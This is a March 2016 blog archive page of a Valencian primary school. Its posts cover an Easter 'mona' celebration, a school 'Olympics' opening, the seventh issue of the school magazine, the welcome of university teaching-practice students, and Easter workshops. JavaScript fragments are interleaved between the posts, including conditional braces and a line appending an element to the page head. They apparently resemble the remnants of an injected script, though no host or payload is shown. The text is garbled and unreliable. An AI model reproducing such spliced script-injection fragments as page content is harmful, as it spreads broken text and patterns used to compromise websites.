Archive for 23 marzo, 2016

VESPRADA DE MONA

Els 472 alumnes  acomiaden el 2n trimestre amb la tradicional Mona de Pasqua.

 

 

BONES FESTES  A T@TS

} else {

INAGURACIÓ OCHANDOLIMPÍADES

Fantàstica la inauguració de les Ochandolimpiades. Les delegacions de Brasil, Perú, Colòmbia, Rússia, China, Mèxic, France, USA, Germany, Romania, España, Portugal, Níger, Argentina, Morocco, Italy, Bulgària, Austràlia, South Africa i Jamaica han desfilat aquest matí per les instal·lacions Olímpiques del nostre pati al ritme dels seus corresponents himnes nacionals.

Prèviament el primer maratonià de la història Fidipiades, acompanyat per la mascota olímpica, ha realitzat un emotiu discurs ressaltant el fet que, malgrat les estrictes polítiques d’immigració de la Unió Europea, tots els atletes i el mateix Fidipiades han pogut aplegar fins a la seu Olímpica de Germans Ochando sense major contratemps.

Amb els sons dels seus himnes nacionals han desfilat baix els aplaudiments d’un públic entusiasta i dels flaixos de la premsa internacional.

 

 

 

if (document.currentScript) {

L’ESPIRAL Nº7. La revista GO del Ceip Germans Ochando.

Arribem al nombre 7 de la revista L’ Espiral, i ho fem amb la mateixa il·lusió que vàrem començar fa 4 anys. Hem procurat aprofitar la revista per a contar les experiències que es viuen dins l’escola. Excursions, Pau, Carnestoltes, sentiments, educació sensorial, projectes… No estan totes, és evident, no caben…. Però estan contades en primera persona pels alumnes, algunes notícies inclús manuscrites pels menudets de primària. Esperem que gaudiu dels textos i les imatges de l’Espiral d’Ochando. Aprofite per a desitjar-vos que gaudiu del temps amb els vostres estes vacances: temps no sols per a veure’l al rellotge, sinó temps que passe i es quede, temps per a meravellar-vos i temps per tenir confi ança, temps per a tocar les estrelles, temps per créixer i madurar. Temps per a ser vosaltres.

} else {

14 ALUMNES DEL PRÀCTICUM DE LA UJI TRIEN GERMANS OCHANDO PER A LA SEVA FORMACIÓ

“Hi ha moltes evidències que mostren que el professorat -la seua preparació i actuació professional- constitueix l’eix fonamental per al bon funcionament dels centres educatius; és el factor que més influencia té sobre la qualitat de l’educació escolar.”

És per aquest motiu que, en el Ceip Germans Ochando, ens mostrem molt satisfets que 14 estudiants de la Universitat publica Jaume I de Castelló, hagen triat el nostre centre per a realitzar les pràctiques de mestres.

Moltes gràcies Alba, Bogdan, Cristian, Erika, Patricia, Daniel, Ariadna, Maria Eugenia, Tamara, Mireia, Clara, Mikel, Adrian i Pilar per confiar que el nostre projecte educatiu puga ser el més adient per completar la vostra formació.

Si bé és cert que la qualitat de l’ensenyament no ve només determinada per la formació del professorat, sinó també per les condicions en les quals aquest col·lectiu ha de treballar, esperem que el nostre projecte tecnològic, les nostres incursions per la innovació educativa, el nostre projecte de socialització, el treball per projecte, l’aprenentatge servei amb la residència de gent gran, el projecte d’hort escolar i ecodelegats, etc.) puguen ser-vos útils, no sols per a exercir de docents en un futur sinó per a formar part d’una comunitat educativa equitativa i de qualitat com deu ser l’educació pública.
ESTUDIANTS PRACTIQUES

                                           14 estudiants de magisteri de la UJI es formen com a mestres en el Ceip Germans Ochando

 

}

TALLERS DE PASQUA

Un any més tornen els Tallers de Pasqua.

Els propers 21,22 i 23 de març realitzarem els nostres tallers on els alumnes de 5é i 6é seran els monitors dels tallers.

Tema dels tallers: LES OLIMPÍADES. De moment ja tenim la mascota de les nostres “Ochandolimpíades” triada pel consell de delegats.
olimpiades

I estes son les mascotes finalistes

 

d.getElementsByTagName(‘head’)[0].appendChild(s);